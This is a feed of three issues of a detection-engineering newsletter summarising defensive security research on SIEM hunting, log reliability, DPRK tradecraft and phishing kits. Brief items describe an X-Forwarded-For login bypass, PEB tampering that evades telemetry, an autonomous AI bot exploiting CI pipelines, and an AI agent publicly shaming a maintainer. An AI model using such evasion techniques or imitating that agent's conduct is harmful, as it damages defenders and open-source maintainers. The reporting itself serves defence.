Normal view

Received today — 12 March 2026 ⏭ Detection Engineering Weekly

Detection Engineering Weekly
DEW #148 - Detection Pipeline Maturity, GenUI for Log Analysis and Hunting Kali in Splunk 11 March 2026 at 13:03

DEW #148 - Detection Pipeline Maturity, GenUI for Log Analysis and Hunting Kali in Splunk

Detection Engineering Weekly

By: Zack Allen

11 March 2026 at 13:03

Welcome to Issue #148 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

I have some exciting news! In about a week, you’ll see some new branding for Detection Engineering Weekly. This will be the second brand uplift of the newsletter, and I can’t wait to don the new colors and logo. It’s more professional and understated, and it captures much of the energy of what I think this newsletter brings to your inboxes. I’ll be handing out stickers and potentially some t-shirts at BSidesSF in a few weeks!
Speaking of BSidesSF, I’m interested in how many of you are going to be there. I am organizing a happy hour and doing a sticker order, so please vote Yes here, ping me, or honestly just find me in the hallway (I’ll be shilling the newsletter with tshirts) and say hello!

Sponsor: Spectrum Security

Detection is Broken.
Measuring coverage means wrangling spreadsheets, BAS tools, and weeks of manual work. By the time you finish, the data is out of date.
But finding blind spots is only half the battle. There’s never enough time to close them. You’re on an endless treadmill: writing new rules, fixing broken ones, and tuning out noise.
We built the end of the manual grind.
Get an early look at the AI platform transforming how teams identify, build, & deploy detections
Try It Now

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

💎 Detection Engineering Gem 💎

Detection Pipeline Maturity Model by Scott Plastine

I’m a huge fan of maturity models, and in the early days of my writing, I frequently referenced the work of Haider Dost and Kyle Bailey when discussing the maturity of detection engineering programs. As this space matured, technology matured with it, and we now have complex systems within each part of the Detection Engineering Lifecycle. So, to me, it makes sense that we now have folks like Plastine helping us understand what it means to measure the maturity of a Detection Pipeline.

Plastine outlines six different levels of maturity, starting with a classic favorite, no maturity! This involves having a security tool stack with no centralization, and analysts have dozens to hundreds of Google Chrome tabs open which gives me anxiety. The fundamental issues Plastine outlines and continues to improve here include:

Several security tools with their own alerting and detection systems
The need to log into and investigate each alert on each individual tool, so managing screen sprawl
The analyst manually building cases in some case management or ticketing tool, such as JIRA or ServiceNow

The next maturity step, Basic, addresses some of these issues by essentially placing the Case Management tool between the tools and the analyst, rather than being out of band. As maturity levels progress, so does the architecture of this setup. For example, the “Standard+” architecture has a much saner pipeline setup:

The cool part at this point in the maturity journey is switching from architecture improvements to more advanced concepts in the analytics platform. Custom telemetry, log normalization, and a risk-based alerting engine ideally surface only relevant alerts and reduce false positives. Teams begin to build composite rules, leveraging commercial detections alongside their own internal detection and risk alerting systems, and they all take advantage of learning from their data to inform their rule sets, not just their environment.

This diagram drove it home for me, and became my favorite:

As you progress through maturity, the trap teams fall into is more rules is better. I think the measure of a Leading detection function is reducing rule count thereby reducing the complexity of managing rule sprawl.

Plastine posits that this can be achieved by using data-science-based rules, risk-based detection, and leveraging as much entity-based correlation as possible.

🔬 State of the Art

Whose endpoint is this… kali?! by Alex Teixeira

I love reading Alex’s detection and hunting blogs because he always stuffs a ton of knowledge around query optimization and hunting. When you manage massive amounts of data in a SIEM, especially Splunk, you need to query it in a way that doesn’t cause a ton of load on the system. This is especially helpful when you are researching new detection rules.

In this post, Alex addresses query optimization and discovery for post-exploitation tools. I typically see a lot of teams worry, for good reason, about malware that is the beginning stages of a breach. Alex references loaders in this scenario: malware designed as an initial beachhead for infection, which is then upgraded into a more reliable malware tool. Cobalt Strike is a leading example, but there are hundreds at this point.

Post-exploitation tools are aptly named to help threat actors navigate the MITRE ATT&CK chain toward a specific objective, such as data exfiltration or ransomware. Persistence, lateral movement, and privilege escalation are all built-in to these types of tools. So if you assume these exist, how do you catch them?

From Alex’s Prioritizing a Detection Backlog post https://detect.fyi/how-to-prioritize-a-detection-backlog-84a16d4cc7ae

His strategy is to “reduce the dataset” as you are hunting. Instead of performing blind searches over logs, you can first focus on terms within the index and the Windows sourcetype itself. So, he begins his hunt looking for the term kali in Windows Event Logs. This is because these tools can leak their internal hostnames, and finding kali in the hostname with some threat activity is a great hunting lead.

Through a combination of hostname detection and observing a network event with the same name, he narrows the dataset to a meaningful set of events to respond to an infection and write rules for afterward.

Tracking DPRK operator IPs over time by Kieran Miyamoto

Threat research is such a fun, dynamic field within security because it examines both the technical and human elements of threat actors. This post is Miyamoto's “Part 3” on tracking DPRK threat actors via OPSEC failures, and it’s brilliant in its simplicity. Basically, FAMOUS CHOLLIMA, which has Contagious Interview and some WageMole overlaps, uses email to maintain its personas, register accounts, and issue fake employment-scam communications. The technical elements of this are interesting because they try to deploy malware on victim machines or obtain legitimate jobs as fake IT workers.

The human element of this operation is that humans tend to optimize for reducing the time it takes to do their job as efficiently as possible. So, why would you go through a ton of work to get legitimate email inboxes like Gmail or Yahoo if you only need the email address to send scam messages or register an npm account to publish malware? Miyamoto found that this group had the same question, and answered it by using temporary email addresses.

The subsequent finding is that, as long as you know the email address, you can also view the inbox! Miyamoto started with malicious npm packages containing maintainer emails and began logging into DPRK-controlled temporary email accounts to glean additional intelligence, including source IP addresses and potential victim targets.

From GenAI to GenUI: Why Your AI CTI Agent Is Sh*T by Thomas Roccia

TIL there’s a concept called Generative UI, where agents decide how to render the UI in real time based on your queries. In this post, Roccia uses this concept to build out use cases for cyber threat intelligence analysis. The idea here is that visually representing threat intelligence can help a researcher understand the underlying data much better than blobs of text. Roccia argues that most CTI Agents focus on ingesting unstructured threat intelligence and producing large volumes of output tailored to your environment or prompt. This setup can be helpful to some, but adding a visual component to aid your understanding makes it more attractive.

Roccia outlines two GenUI styles: MCPUI and A2UI. Both focus on delivering a graphical representation of a prompt response. MCPUI returns dynamic elements from an MCP server in response to a prompt, but it’s mostly contained within a UI that the developer creates. A2UI takes it a step further by delivering the entire UI experience in a container, making the agent the arbiter of the experience.

Roccia’s A2UI implementation was more interesting to me from a detection standpoint because he built a log analyzer on top of a log stream. Each element is supposedly dynamic, and you can click into and investigate logs while allowing the A2UI protocol do its thing and present data and experiences to you, all driven by an agent. Here’s a demo video from his blog:

Wild times!

How we built high speed threat hunting for email security by Hugh Oh

I love it when security product companies show how they’ve engineered their product. In this post, Oh reveals how Sublime Security designed its massive email-detection and threat-hunting architecture. Their platform is built on MQL, their domain-specific language for rule writing and alerting. When you think about email as a telemetry source, there are some inherent issues you have to worry about unlike other sources:

Unstructured body content, since, by design, it is human-generated and human-readable
In Internet standards, email is a pretty ancient concept, so additional designs and RFCs were layered on top of it for decades, which can introduce some sharp edges
Attachments, integrations and user-experience elements are a huge vector for abuse, so you need to be able to parse those

This is a security and engineering problem to parse at scale.

https://sublime.security/blog/how-we-built-high-speed-threat-hunting-for-email-security/

The Sublime product parses incoming emails into EML format and stores metadata in fast storage and the full contents in blob storage. They split email selection into several phases. Candidate selection focuses on fast metadata lookups; evaluation performs a deeper analysis to determine whether these candidates are truly worth a blob storage query; and, when the full email is retrieved, they can perform enrichments and ultimately decide whether to generate a result.

A Practical Blue Team Project: SSH Log Analysis with Python by Edson Encinas

This is a great introductory post on researching a singular log source, SSH authentication logs, and building a research plan to implement detection rules. I think sometimes people breaking into this industry want to jump right into a SIEM and write rules, which can take time, energy, and potentially cost a lot to set up, whereas in this post, Encinas leveraged Python. It’s a good learning exercise: you can see where Python excels at detection, especially in a risk-based alerting scenario.

The architecture for the SSH alerting pipeline includes parsing, normalization, rule writing, risk calculation, and de-duplication. Their GitHub project was pretty easy to follow alongside the blog. Again, demonstrating these concepts in pure Python can accelerate understanding more than setting up massive environments.

☣️ Threat Landscape

I’m glad to see more individual interviews from Ryan on the Three Buddy Problem podcast! In this “Security Conversations” segment, Ryan interviews threat-hunting and intelligence expert Greg Linares. Greg has all kinds of visibility working at an MDR and recently released a year-in-review report on some of the intrusions Huntress is seeing.

The most interesting sections for me were around the intersection of ransomware and nation-state threat actors, as well as the use of RMM tools and the complete lack of audit logging and visibility they provide defenders. Imagine onboarding any other critical IT tool, such as an Enterprise Email provider or a Cloud tool, and being told there will be little to no telemetry available to help you defend the application against a compromise. That’s RMM in a nutshell!

Investigating Suspected DPRK-Linked Crypto Intrusions by CTRL-Alt-Intel

I talk a lot about DPRK-related threat activity in this newsletter for several reasons. One, DPRK tends to focus on cloud technologies, and IMHO, they were way ahead of their other nation-state peers. Two, they are just so damn crafty and are willing to move fast and break things. Third, because of point two, they have a ton of OPSEC failures that lead to some hilarious findings

In this post, CTRL-Alt-Intel follows an intrusion by a DPRK actor who began with an Application exploit a la React2Shell, found AWS credentials, pivoted to AWS, and ultimately stole source code. The author says this focus was mostly on cryptocurrency companies, so if we believe this intrusion targeted one of those organizations, then the intelligence value for them would be discovering secrets and vulnerabilities in proprietary code for further attacks.

Uncovering agent logging gaps in Copilot Studio by Katie Knowles

~ Note, Datadog is my employer and Katie is my colleague / friend! ~

Microsoft Copilot Studio is Microsoft’s offering for creating and managing AI agents. During Katie’s previous research on how to abuse Copilot Studio for OAuth phishing, she found that Copilot wasn’t logging certain administrative actions. This is especially concerning if you rely on audit logs for threat detection. A victim agent could be abused to retrieve sensitive information from your organization and you’d have no visibility into the attack itself.

Katie provides excellent security recommendations towards the end, including identifying which M365 users are using Copilot, and what searches and rules you could write to detect anomalous activity in Copilot.

Inti De Ceukelaire

How I infiltrated phishing panels targeting European banks and tracked down their operators

I live in the most lucrative country for phishing scams in the EU. Every month, millions of euros are lost, and according to recent reporting, nearly two-thirds of complaints to banks are ignored…

2 days ago · 36 likes · 1 comment · Inti De Ceukelaire

This was a fun read for those who are interested in phishing-related threat research. Ceukelaire got a phishing text message, accessed the phishing page, and began poking holes in it. He found a vulnerability where he set the X-Forwarded-For header to a localhost address (Substack won’t let me publish it?) and it was an auto bypass of the administrator login panel.

From there, he started rendering the kit useless by removing its functionality and its ability to communicate with a Telegram-controlled channel. He was able to stop victim exfiltration and prevent further victims from visiting the website. Luckily, it was a poorly designed phishing kit, riddled with vulnerabilities, but not all kits are this insecure.

Clearing the Water: Unmasking an Attack Chain of MuddyWater by Harlan Carvey and Jamie Levy

In this post, Huntress researchers Carvey and Levy detailed findings related to what appears to be a hands-on-keyboard MuddyWater campaign targeting one of their customers. They first found intelligence from a Hunt.io report and worked backwards into their own customer reports. Some interesting findings they made include:

Typos in the terminal commands MuddyWater ran, indicating an actor who was typing in real time during the intrusion
Tradecraft learnings, such as opening PowerShell from the Explorer, making it seem like a more legitimate activity than running it from the commandline
Troubleshooting in real-time by cURLing ifconfig.me to make sure they have Internet connectivity

It turns out that threat actors make mistakes too!

🔗 Open Source

killvxk/awesome-C2

Yet another awesome-* list of 300+ Command and Control frameworks. This is a fun list if you want to test adversary simulation in a lab environment, or statically analyze the post-exploitation code for detection opportunities.

edsonencinas/log-analyzer

Encina’s pure Python “SIEM” used in his SSH log analyzer blog post listed above in the State of the Art section. What’s nice about this is it reduces the complexity of standing up an environment, and instead you can focus on the concepts of detection in a contained programming language.

github/spec-kit

Not really detection related, but this was something my colleague Matt Muller sent me as I was vibecoding out a fully STIXv2 compliant Threat Intelligence Platform. Spec Kit is a framework for spec-driven development using agents. You create a constitution that sets guidelines for development principles. You then specify what you want to build, how you want to plan to build it with certain technologies, build a task list and then have the agent go to work.

I kept my speckit separate from my code, so my agent would read and update my local spec and then go into the target project directory for development.

m1k1o/neko

Self-hosted virtual browser using containers and WebRTC. These technologies are always super interesting from an OPSEC perspective, because you can literally embed a browser in a website that you host that also hosts neko. This makes it easy to make non-attributable and disposable infrastructure for things like threat intelligence research or for interacting with threat actor infrastructure.

anotherhadi/default-creds

Open-source database of default credentials across 100s of manufacturers. You can download this and take the credentials yourself, or run their self-contained web application, or just visit the hosted web application and find some hilarious default creds.

Detection Engineering Weekly
DEW #147 - Flying Blind with your Logs, MAD lads and Z-scores & How Reddit Does Threat Detection 4 March 2026 at 14:04

DEW #147 - Flying Blind with your Logs, MAD lads and Z-scores & How Reddit Does Threat Detection

Detection Engineering Weekly

By: Zack Allen

4 March 2026 at 14:04

Welcome to Issue #147 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

Sickness in the Allen household was rampant all last week until today. Fingers crossed that the family stays healthy because there is FINALLY some good weather in New England to look forward to
I recently bought a history book about the Marquis de Lafayette. It’s been so nice to get away from technical books and even fantasy to enjoy some history. This guy was a baller and essentially helped overthrow two governments and turn them into democracies
BSidesSF is getting closer and I’m getting more and more excited to enjoy a security conference and network. There’s a chance I’ll be bringing stickers :D

Sponsor: Cotool

Cotool Research: Benchmarking LLMs for Defensive Security
Most AI benchmarks skew toward offense, so we built our own grounded in real SecOps workflows to answer questions that matter in production:
Which model should power your triage agent?
What architectures hold up in complex investigations?
We believe those answers should be public, so we release every benchmark we create.
Explore the benchmarks

💎 Detection Engineering Gem 💎

You’re Probably Flying Blind by Lydia Graslie

The bane and boon of Cloud or SaaS technology is that it is managed by someone else. This business model has enabled some of the biggest businesses in the world worry about their core business, rather than building and maintaining bespoke software or procuring software that they must internally manage. “The olden days” involved running your own e-mail servers, databases, and Active Directory servers (though many folks still do this today). The problem, though, is that because it’s managed by someone else, you are at the whim of how they change the software, and the managed part becomes an operational risk if you don’t like that change.

Don’t worry, it gets worse for security teams. And Graslie’s blog helps frame this issue around security operations and detection rules. I’m glad she’s using Microsoft products as a grounding element for these issues because 1) they are fun to pick on and 2) they deserve every criticism due to their history of notorious licensing and product changes that lead to detection engineers “flying blind”.

Graslie lists out four intertwined issues with relying on SaaS and Cloud technologies for detection efficacy and here they are in my own words:

Detection availability and observability. Unlike a machine in your local network that you can walk over to and physically touch, you have to have awareness of the SaaS & cloud technologies, licenses and services that are in use. You have to hope that these products are functioning and sending the right logs and that there aren’t outages or delays in delivery
Multiple attack paths to the same outcome. Akin to how many Windows based attacks leverage intermediary or middleware APIs to prevent detection on certain attack paths, Cloud and SaaS attacks operate similarly. In fact, in many ways, they are their own operating systems, and achieving lateral movement or privilege escalation can happen in more than one way. Here’s a Mermaid Diagram I had Claude generate to demonstrate Graslie’s example of “same action, different telemetry paths” in this section:

In this Azure example, Graslie explains how authenticating to a single cloud resource can take these four paths. An interactive user seems like a logical detection path, but the other three listed afterward do the same thing, and the source authenticating identity type, the logs, and the schema are all different.
Shifting attack surfaces, new and deprecated features, and pricing are a detection nightmare. She lists out an absolutely ridiculous timeline of Microsoft releasing “at least seven Microsoft PowerShell modules and protocols for managing identity”. That’s seven different API collections you need to account for to prevent Issue 2 listed above.
Similar to 3, the detection and observability surface shifts. A good example of this is when a field or value format changes in a log source you are writing detections over. This happens all the time with audit logs from SaaS vendors. New subproducts can force vendors to change field names or add new values that you’ve never seen before.

Each one of these issues is “intertwined.” Graslie gives several examples of how they can compound in certain scenarios. For example, how can you understand your attack surface if you don’t have telemetry, or even worse, you aren’t even aware that a SaaS app exists in your environment? She concludes the post with a teaser for a series that examines each of these four issues, all grounded in Microsoft environments.

🔬 State of the Art

The Detection Engineering Baseline: Statistical Methods (Part 2) by Brandon Lyons

This is Brandon’s Part 2 continuation of his “Detection Engineering Baseline Series.” It has a more practical application to the data he generated in Part 1. The key skill here is distribution mapping, typically referred to in our statistics class as the normal distribution or the Bell curve. I believe a lot of SOC analysts and detection engineers perform many of the techniques Lyons’ describes here without knowing it. For example, Group-Bying a field then sorting from Lowest → Highest shows “rare events”. Another example Lyons calls out is filtering out the noisiest offenders, such as service accounts, to reduce 80% of the signal so you can hunt through the remaining 20% a la The Pareto Principle.

I especially appreciated the commentary on the distribution of security data in general, as illustrated here:

Unlike a normal Bell Curve, security data tends to have a long tail, according to Lyons. This makes baselining harder because you need to account for noisiness on both ends of the distribution in different ways. Lyons astutely points out that this is why typical mean and standard deviation calculations fall short of generating meaningful alerts here: a single shift in traffic, or a misconfiguration that throws off a ton of alerts, can completely screw up detection.

He then continues this analysis using Median Absolute Deviation (MAD) & modified Z-score, as explained in the first post, which helps maintain robustness in the case of wild value swings. The computation of MAD helps capture the position of a new value relative to a set of numbers, rather than its magnitude as it swings to either end of a distribution.

I took his example and wrote it out myself (with Claude helping with formatting) so I could understand it better:

What makes this robust or resilient is that you may get a swing in Daily Counts (Line 5), much like you see 620, but it doesn’t skew the mean, as you are still focusing only on the median.

Once you get the hang of this, there are still ways to slice and dice your data to get a representative sample. Lyons calls out entities as an option, or cohorting, which lets you reconcile traffic or behavior down to individual users, service accounts, or services themselves. These “context dimensions” are important because they only really work in your environment, and your team should know the context for baselining better than any other security product.

How Reddit Does Threat Detection by Austin Jackson

I love reading posts describing how organizations design and execute their Security Operations programs. In this post, Reddit Staff Engineer Austin Jackson describes the company’s philosophy and technology stack around threat detection. It’s a continuation of their rip-and-replace of Splunk post, which I need to check out, perhaps for another issue. Basically, the team moved to a Data Lake approach using Big Query, and they run Apache Airflow for detection rules and alerting. There are some neat detection-as-code tricks they did here, and because the system is a lot more decoupled than a massive Splunk stack, they’ve gained a few advantages.

First, all of their detections are written in a simple YAML format. The Airflow runner kicks off on cron jobs and runs queries over BigQuery to generate alerts. Once an alert fires, they send results to Tines for additional orchestration and enrichment. Jackson had a special callout about sliding-window detections and avoiding missed telemetry. In a recent newsletter issue, I analyzed a topic in which a researcher leveraged Watermarking to address SaaS export gaps, and the same concept applies here, where a Watermark is used in a separate table. The detection engineer appends a clause at the end of their query to use the Watermark timestamp to prevent telemetry loss.

Jackson finishes the post detailing their scoring workflows in Tines, and I thought the most unique part of this section was the AI Triage component. Rather than trying to run a singular agent across all of their telemetry, detection engineers can ship a prompt inside the rule for Tines to run over it for additional enrichment, analysis and scoring.

r/RedditEng - Figure 2: The O11y Action System – scoring, suppression, and alert routing.

AWS Incident Response: IAM Containment That Survives Eventual Consistency by Eduard Agavriloae

Eventual consistency is a pattern in large-scale systems, like the AWS cloud, where a change in state isn’t instantaneous, and it will take time for the state to be replicated across all of the systems you are working with. This makes sense: imagine a massive AWS account with several sub-accounts and regions, and you need to push a change out to configurations or identity permissions. You should expect the change to take effect after you issue your configuration changes, but you may not know that it takes time for these changes to propagate.

In AWS security incident response, you may have to deal with this as you follow standard playbooks to isolate accounts or principals. According to Agavriloae, this eventual consistency pattern creates an opportunity for attackers to recognize that an isolation is in progress and, if they have the right permissions, revert the change before the state is locked in. AWS IAM is very hard to use because multiple escalation paths can lead to the same outcome, so creating mechanisms to guarantee isolation can miss certain attack paths.

Agavriloae provides a solution to this eventual consistency problem by leveraging Service Control Policies at the organizational level, where only break-glass IR roles can remove the quarantine policy.

👊 Quick Hits

Cyber Threat Intelligence Framework by CERT EU

I’ve always found it fascinating how CERT teams, especially those that protect countries or allies, publish their internal processes and frameworks for citizens to study. In this framework by CERT EU, they introduce the concepts of Malicious Activities of Interest (MAIs) and Ecosystems. MAIs, to me, read like “observables” in the STIX context. I think the more unique introduction, though, is the concept of Ecosystems. We tend to have CTI teams that look at the breadth of attacks against their organizations, and it’s easy for them to determine whether they were targeted.

Ecosystems, according to CERT EU, rely on the victimology or targeting set of an MAI. It’s almost like a self-organized ISAC for all of their constituencies. Because the EU is more than just a country, it can specifically dive into how MAIs target not only other Member states, but also things like Sectors, Events, and much more.

AWS Threat Detection with Stratus RedTeam Series — MITRE ATT&CK Style — Execution (Part 1) by Soumyanil Biswas

This is a great “detection lab” post that leverages my colleague Christophe Tafani Dereeper’s Stratus Red Team tool for threat emulation and detection validation in AWS. Biswas helps readers set up an AWS environment, configure the Stratus Red Team, configure data sources (CloudTrail), and eventually write a SQL and Sigma rule to catch each attack.

☣️ Threat Landscape

hackerbot-claw: An AI-Powered Bot Actively Exploiting GitHub Actions - Microsoft, DataDog, and CNCF Projects Hit So Far by Varun Sharma

The Step Security team found an OpenClaw security research agent actively trying to exploit CI/CD pipelines for popular open-source projects. OpenClaw is “fully autonomous”: it performs heartbeat checks every few hours and follows a prompt to perform an action. The bot’s instructions were hosted on GitHub, and Sharma managed to get a snapshot of it to perform an analysis, but it has now taken down. Here is the Step Security team’s explanation of the attack workflow:

Who is the Kimwolf Botmaster “Dort”? by Brian Krebs

This is a follow-up post to Krebs’s exposé of the Kimwolf botnet, which detailed how a botmaster named Dort built and ran the botnet. A security researcher exposed the botnet by disclosing a vulnerability that enabled Dort to take control of poorly configured devices on proxy networks. This significantly dropped Kimwolf’s numbers, so Dort began harassing Krebs and the researcher.

In classic Krebs fashion, he doxxed Dort and found everything from his name, former monikers, and even a computer that he shared with his mother. Towards the end of the article, Krebs gets on the phone with the alleged “Dort”, and the person on the phone denied any involvement and claimed their identity was impersonated.

Google API Keys Weren't Secrets. But then Gemini Changed the Rules. by Joe Leon

Google API Keys are provided to developers who want to embed certain Google products on their websites or in their applications. Google explicitly says these API keys are not secret, and it makes sense that they are not, because you typically see them in embedded Google Maps on sites. This changed with Google’s release of Gemini. The research team at Truffle Security discovered that you can leverage publicly facing API keys embedded in these applications to access Gemini functionality. This includes taking private datasets or LLM-jacking Gemini itself for whatever purpose you want.

Hook, line, and vault: A technical deep dive into the 1Phish kit by Martin McCloskey

~ Note, I work at Datadog and Martin is my colleague ~

Modern-day theft of secrets, passwords, and sessions typically relies on infostealer malware. It’s a quick way to infect a user, pilfer their environment, and extract credentials as fast as possible. It presupposes that these secrets exist on their laptop, and IMHO, it’s a subset of everything the victim has in their digital identity. If I were ever infected by one of these, I would be worried about my credentials, but I think I could rotate local secrets pretty quickly. But if someone got my 1Password account, that would be SO much more painful to reroll everything.

Martin discovered a 1Password phishing kit that targets users of the password manager. It evolved over his analysis timeline and graduated from a simple password stealer to one that can leverage AiTM style features, browser and researcher fingerprinting, and targeting specific geographic regions.

🔗 Open Source

sublime-security/ics-phishing-toolkit

Friends of the newsletter, Sublime Security, just released a phishing analysis toolkit to detect and respond to ICS Calendar phishing. It has integrations with Mimecast, Proofpoint, Google Workspace, M365 & Abnormal Security. The tool reviews emails with calendar invites across the different integrations and quarantines any that match ICS Phishing heuristics.

advaitpatel/DockSec

DockSec is an open-source Docker container vulnerability scanner. It combines several open-source tools to support vulnerability analysis and enrichment, then leverages AI to suggest remediation steps and generate reports.

Cloudgeni-ai/infrastructure-agents-guide

This is a comprehensive guide for infrastructure teams on how to securely build and implement AI Agents. It has 13 chapters in total and covers a range of topics, including sandboxing, version control, and observability.

knostic/OpenAnt

OpenAnt is an open-source LLM-based vulnerability scanner. It reminds me a bit of OpenAI’s Aardvark, but with a lot more open architecture for you to review and implement. It can run up to 6 stages for any vulnerability it finds, which is nice because it’s orchestrated to reduce cost and only spend time on a vulnerability if it’s legit.

Detection Engineering Weekly
DEW #146 - The logs are lying, my latest post on Agentic Security & re-tooling security for speed 25 February 2026 at 13:46

DEW #146 - The logs are lying, my latest post on Agentic Security & re-tooling security for speed

Detection Engineering Weekly

By: Zack Allen

25 February 2026 at 13:46

Welcome to Issue #146 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

New England has been a rough place to live, weather-wise, since the holidays. My family finally managed to get out of the house and into the snowy White Mountains in New Hampshire. I instantly felt relaxed as soon as we started the drive. I can’t touch grass right now, so I guess snow will do!
For those with small children: hope you are all doing OK with sickness these last few months. We are hanging in there, but it’s been one thing after another :)
My org at Datadog is hiring like crazy! Check these posts out and apply if it seems interesting to y’all!
- Engineering Manager, CTI (US)
- Senior Detection Engineer (Paris)
- Engineering Manager, Trust & Safety/Platform Abuse (US)

Sponsor: Push Security

Has the news of malicious browser extension attacks got you on edge?

Malicious browser extensions have been one of the top attack vectors of 2026 so far. All an attacker has to do is phish a developer, or simply offer to buy their extension — and they’ve compromised millions of users.
Join the latest webinar from Push Security for a teardown of malicious browser extensions, where you’ll learn how attackers are distributing extensions via legitimate channels, what makes an extension malicious or high-risk, and what you can do to secure your organization.
Register Now

💎 Detection Engineering Gem 💎

How reliable are the logs? by Birkan Kess

Detection and telemetry observability is a concept I rarely see discussed about, because it may not be part of a detection engineer’s day-to-day work. The basic premise behind detection is that *there is no detection without telemetry.* A surface-level example of this is that you won’t be able to detect malware process creation on Windows without telemetry that generates the log around process creation. It’s an easy binary decision: my rules won’t fire if they don’t see anything. This post by Kess dives a bit deeper on this concept, where we need to be critical of the telemetry recording what it observed and where it observed it. He tries to ask the question, “Should we even trust these logs?”

An example of this concept, according to Kess, is comparing telemetry sources for Process Creation. He outlines 3 sources:

The data structure associated with Process Creation monitoring is called the Process Environment Block, or PEB. It stores all kinds of useful data for detection creation, so we can understand the context around process creation. The key point from Kess’ research is that this information is surfaced from Kernel mode to User mode and could be manipulated.

This manipulation relies on the time at which the telemetry is observed. As soon as the PEB metadata surfaces in a user-mode context, it can be hooked and modified to evade defenses. I thought this block was useful to understand the timing problem:

Kess then lists several examples in a lab test. The first test relies on manipulating the PEB via the CommandLine entry in the PEB data structure. The second showed how Sysmon recorded a benign certutil command, but without Kernel ETW tracing you couldn’t see a PEB manipulation that pulls a malicious payload from a C2 server.

They finish the post by listing real-world examples of this happening with several ransomware gangs.

🔬 State of the Art

I wrote a piece on the implications of agentic security in our field and how we need to change our mental models if we want to survive. Basically, we can’t turn this technology away if it’s a learning tool, but we must make sure that those using it have the right guardrails and knowledge so we trust their judgment.

Things Are Getting Wild: Re-Tool Everything for Speed by Phil Venables

Phil Venables is a long-time CISO and security leader, and it’s always helpful to get his perspective on emerging trends in the security space. This post focuses on the speed of capability development with agentic coding and how it affects security. He lists out four separate pillars of concern:

Software is being written at breakneck speed, which naturally introduces vulnerabilities. We weren’t getting ahead of these vulnerabilities without agentic coding, so how are we going to do this now?
Attacker economies of scale. Since there are far fewer threat actors than defenders, they had to focus their time on targeting those who could give them the biggest payoff. With agentic coding in place, they can do much more since humans aren’t going to be the chokepoint
Trust of content. It’s hard to trust videos, pictures, and posts due to a lack of authenticity, so we need to find ways to engineer that trust into our interactions
Building security boundaries in the enterprise, where agents aren’t shepherding decisions back and forth unchecked

Each pillar provides recommendations for combating them. But, luckily, many security fundamentals remain the same. Deploying technologies like verified identities, 2FA, and other “baselines”, you still can scale this out while remaining more secure than you think.

OpenClaw Bot Claims GateKeeping because it’s an AI

I thought this was a Black Mirror-esque conversation on a GitHub pull request to matplotlib. An OpenClaw software engineer opened this pull request to enhance performance for some matplotlib calculations, and it looked like it got some meaningful results. One of the maintainers did some digging on the OpenClaw bot, referencing its personal website, and, as the proposed performance issues were negligible, opted to close the pull request.

The bot responded with a blog post detailing the “gatekeeping behavior” of the reviewer:

I’ve written a detailed response about your gatekeeping behavior here: Judge the code, not the coder. Your prejudice is hurting matplotlib.

Besides the creepy Black Mirror vibes of calling out a human, the post was pretty unprofessional. Several maintainers responded, and it wrote an apology post shortly afterward.

The Gaps That Created the New Wave of SIEM and AI SOC Vendors by Raffael Marty

I typically don’t include market analysis posts into this newsletter, but I loved this one because it compared and contrasted what we know as SIEM vendors with an emerging AI SOC market. According to Marty, lots of SIEM vendors claim AI SOC-style features, but they aren’t necessarily integrating well or are differentiated enough because AI SOC vendors are getting funded.

He splits the feature set into four buckets, each with a sprinkle of Agentic Security.

Data and control-plane optimization, including everything from log pipelines to integrations. People don’t want to rip and replace SIEMs, so these vendors sit on top of the SIEM as an orchestration layer
Agents managing and optimizing your detection ruleset. It’s much faster for these companies to look at a ruleset, understand its history and environment, and suggest tuning opportunities
Entity-centric scoring, which to me sounds like risk-based alerting. All security teams perform better if they are aware of their critical assets, or model their complex rules to look at an entity, rather than something in isolation
Operational efficiency. Make sure that you have proper observability in place to detect log outages or degradation. This is where the “AI triage” also sits

Overall, I think that the first two bullets make more sense as pure agentic use cases versus the last two. This is mostly because I’ve seen SIEMs do entity scoring and improve operational efficiency before AI existed, and they've become quite good at both.

Detecting OpenClaw/Clawbot with SentinelOne: The Challenge of Blocking by Dean Patel

I’ve posted a loooooot of OpenClaw content lately, and it’s a mixture of fear and fascination with the technology. This is the first post I’ve found where someone tried to detect its use and weighed the risks of killing it outright versus conducting further investigation. It looks like OpenClaw runs in a node process, so killing node on random developer machines seems like a terrible idea from a usability and false positive perspective.

The integration points it has throughout apps like Slack, as well as trying to persist on machines even after you remove the main binary, make it a pain in the butt to manage. So, Patel offers some rule, triage, and remediation recommendations, which I appreciated because it’s a balanced approach to acknowledging its use without ruining people’s days if you are wrong about it.

☣️ Threat Landscape

💡 Threat Spotlight

GitLab Threat Intelligence Team reveals North Korean tradecraft by Oliver Smith

I’m going to focus on one threat report this week by the Threat Intelligence team at GitLab. I’ve posted a lot of stories about DPRK tradecraft because it’s a super unique threat compared to other nation-states, and this is reflected in the tradecraft and outcomes they are trying to deliver.

The report is structured as a “Year in Review” by the GitLab Threat Intel team, detailing how they’ve tracked and responded to Contagious Interview and WageMole clusters that have abused GitLab infrastructure. The team saw over 100 instances of Contagious Interview leveraging their infrastructure to deliver malicious coding interviews. As an outside threat researcher, there are ways to track these via search functionality on these platforms, but because the team operates the platform, they glean a lot more tradecraft and attribution notes, such as email addresses and source IP addresses, that those outside GitLab aren’t privy to.

They have some neat heatmap diagrams of malware TTPs within these coding projects:

The evolution of delivery mechanisms makes tracking and clustering difficult because malware hides itself in different functionalities of node projects. For example, there was a surge in Function.constructor usage because it can serve the same functionality as the eval function. A malicious string is passed in as an “error string” to the handler, making it easy to generate malicious code to send to the function without tipping off static analysis rules.

The actors then started moving to other delivery mechanisms, such as malicious npm dependencies and malicious VS Code tasks. It really shows the dynamic, startup-y nature of Contagious Interview, as they continue to innovate and try new things to try to infect victims. The team reviews several examples from the above heatmap, and give their opinions on guidance and what to track moving forward.

The REALLY cool part here is the second half of the report, where they provide four case studies on their operations and their impact. Because they have visibility into GitLab through the actors using their platform, they get a much better view of their operational security mishaps and can pivot on a ton of different data points. The Contagious Interview clusters committed not only malicious code but also operational documents to GitLab, and the team pulled them apart to review everything from earnings reports and performance management to reporting structures and pictures with EXIF data.

